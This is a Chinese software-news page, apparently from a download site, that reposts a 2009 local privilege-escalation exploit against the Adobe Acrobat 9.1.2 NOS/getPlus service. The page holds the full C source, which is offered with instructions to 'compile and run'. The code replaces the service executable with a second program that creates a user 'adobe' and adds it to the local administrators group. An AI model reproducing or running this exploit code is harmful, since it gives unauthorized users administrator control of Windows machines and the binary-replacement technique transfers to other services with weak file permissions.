pc软件 文章资讯 手机软件

您当前的位置→图文中心新闻资讯安全播报Adobe Acrobat 9.1.2 NOS 本地提权漏洞
阅读排行

Adobe Acrobat 9.1.2 NOS 本地提权漏洞


2009/7/26  编辑:佚名 来源:本站整理

Adobe Acrobat 9.1.2 NOS 本地提权漏洞

/*

alwaysdirtyneverclean.c

AKA

Adobe Acrobat 9.1.2 NOS Local Privilege Escalation Exploit (alwaysdirtyneverclean.zip)

BY

Jeremy Brown 2009 [0xjbrown41@gmail.com] 07.21.2009

**************************** ******************************

I've been up for nearly 24 hours (only the last few doing research though). This exploit is based on the

brief information provided by Nine:Situations:Group http://www.milw0rm.com/exploits/9199). Exploiting

improper permissions is fun. A few notes are in order though. The getPlus service (that I tested, via 9.1.2)

isn't installed as an "Automatic" service, therefore making it slightly harder (but not hard) to practically

use to your advantage. But I tested running this code under a GUEST account and it worked pretty good (just

the first time though). Change the values as needed, compile and run. Things could be more or less silent,

lethal or non-lethal... it is completely up to you. Things cannot get much simpler than this :)

Tested on Windows XP SP3 + Adobe Acrobat 9.1.2 (installed from adobe's download manager, then updated)

But maybe give Adobe a break? 2009 has been a rough year for them already, heh. Sleep time.

 

alwaysdirtyneverclean.c

*/

#include <stdio.h>

#include <windows.h>

#define DEFAULT_TARGET  "C:\\Program Files\\NOS\\bin\\GetPlus_HelperSvc.exe"

#define DEFAULT_BACKUP  "C:\\Program Files\\NOS\\bin\\GetPlus_HelperSvc.exe.bak"

#define DEFAULT_EXECUTE "C:\\Documents and Settings\\All Users\\Documents\\bin.exe"

//#define DEFAULT_EXECUTE "C:\\WINDOWS\\system32\\calc.exe"

int main(int argc, char *argv[])

{

     MoveFile(DEFAULT_TARGET, DEFAULT_BACKUP);

     CopyFile(DEFAULT_EXECUTE, DEFAULT_TARGET, FALSE);

     // shakee and bakeee

     return 0;

}

///////////////////////////////////// cut /////////////////////////////////////

/*

bin.c

FROM

Adobe Acrobat 9.1.2 NOS Local Privilege Escalation Exploit (alwaysdirtyneverclean.zip)

BY

Jeremy Brown 2009 [0xjbrown41@gmail.com] 07.21.2009

*/

#include <stdio.h>

#include <windows.h>

#define CMD "C:\\WINDOWS\\system32\\cmd.exe"

#define ONE "/C net user adobe pwned /add"

#define TWO "/C net localgroup administrators adobe /add"

int main(int argc, char *argv[])

{

STARTUPINFO si = {sizeof(STARTUPINFO)};

PROCESS_INFORMATION pi;

     CreateProcess(CMD, ONE, NULL, NULL, 0, 0, NULL, NULL, &si, &pi);

     CreateProcess(CMD, TWO, NULL, NULL, 0, 0, NULL, NULL, &si, &pi);

     // mmmmmmmmmmm.. chocolate browie ice cream smoothes are goooood

     return 0;

}

相关文章

CAD转换成PDF、JPG等格式,CAD转换成其他文件的技巧汇总:CAD是设计、建筑、电子机械行业常用的软件,应用广泛,默认的格式为dwg,只有用CAD软件或者CAD查看器才能打得开。

badrabbit(坏兔子)病毒来到,请大家及时预防:距今最近的一次大规模互联网病毒--勒索病毒过去没多久,又一个与勒索病毒相似的badrabbit(坏兔子)病毒已经席卷欧洲多个国家。

王者荣耀梦奇AD流出装搭配方法 王者荣耀梦奇AD流怎么出装:王者荣耀梦奇AD流出装搭配方法王者荣耀梦奇AD流怎么出装?王者荣耀梦奇怎么出装?梦奇是作为一个坦克登陆游戏的,而且技能都是法术加成,但是他的站桩能力却是可以出AD的输出装,那么具体出装是什么呢?王者荣耀梦奇AD流出装搭配方法是由小编给大家带...。

发表评论
网站帮助 - 广告合作 - 下载声明 - 网站地图